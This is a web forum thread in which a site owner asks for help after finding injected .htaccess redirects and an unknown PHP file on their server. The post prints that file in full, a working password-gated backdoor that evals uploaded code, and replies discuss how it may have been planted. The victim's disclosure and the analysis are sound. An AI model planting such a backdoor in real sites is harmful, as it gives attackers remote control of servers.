Help. I've been hacked

[mwstewart]

Hi all, Sometimes when accessing my site I get redirected to an alternative site. I checked htaccess and it had a load of refirects in there that I didn't write. Permissions for it were 770.

 

I found the following in a php file (that I did not create):

<?php
error_reporting(1);
global $HTTP_SERVER_VARS; 

function say($t) 
{ echo "$t\n"; }; 

function testdata($t) 
{ say(md5("testdata_$t"));};

echo "<pre>"; testdata('start'); 
if (md5($_POST["p"])=="aace99428c50dbe965acc93f3f275cd3")	{
	if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"],"rb"),$HTTP_POST_FILES["f"]["size"])) { 
		eval($code); }
	else {testdata('f'); }
	; }
else{testdata('pass'); }; 
testdata('end'); 
echo "</pre>"; 
?>

 

Is a hacker trying to figure out how to exploit my site? How did someone have permission to create a file on my server? Is that possible because I have 'weak' code, despite file permissions preventing global write?

 

I have notcied that in the above php file, and the modified .htaccess that there is a lot of blank space around the code, which makes me think the modifications are result of someone elses code.

 

Any advice here appreciated.

 

[premiso]

Are you on a shared host? If so shared hosts are not secure at all and easily hacked.

[Mchl]

Someone had to have access to your account. Either got your ftp credentials (username, password) or your host is cheating on you.

[corbin]

That's essentially a backdoor.  They can upload and run any script they want through that file.

 

It probably got uploaded through a security flaw or something.

[PFMaBiSmAd]

Two easy ways that someone can put a script on your server are if you have an upload form without validation of what was uploaded or where it is put or you are including a file where the name/url of that file is taken from a variable that comes from outside your script without validation of what or where that file name is.

[darkfreaks]

also a good idea to close the open connection with fclose()

 

otherwise anyone could over write the $code variable

[gevans]

@darkfreaks

 

That's not his code, that's a back door that someone has uploaded to his server.

[darkfreaks]

http://www.rubyrobot.org/article/protect-your-web-server-from-spambots

 

this is a nice way through PHP by banning IP's that attack with listed spam bots

[Mchl]

IP banning is no good. I have like half the internet blocked because I use ISP with changing IPs.

[premiso]

http://www.rubyrobot.org/article/protect-your-web-server-from-spambots

 

this is a nice way through PHP by banning IP's that attack with listed spam bots

 

That is for spambots...not people randomly hacking the site.

[Mchl]

So what? Can't spambots run from the same IP range that I do?

[darkfreaks]

there is always mod_rewrite

// disables HTTP_TRACE//
RewriteEngine On 
RewriteCond %{REQUEST_METHOD} ^TRACE 
RewriteRule .* - [F]

 

dont know how far that would go to help

[waynew]

Do you have an upload script, and if so... are you using is_uploaded_file( ) and checking for file types properly? (including checking the filename to see if the right extension exists?)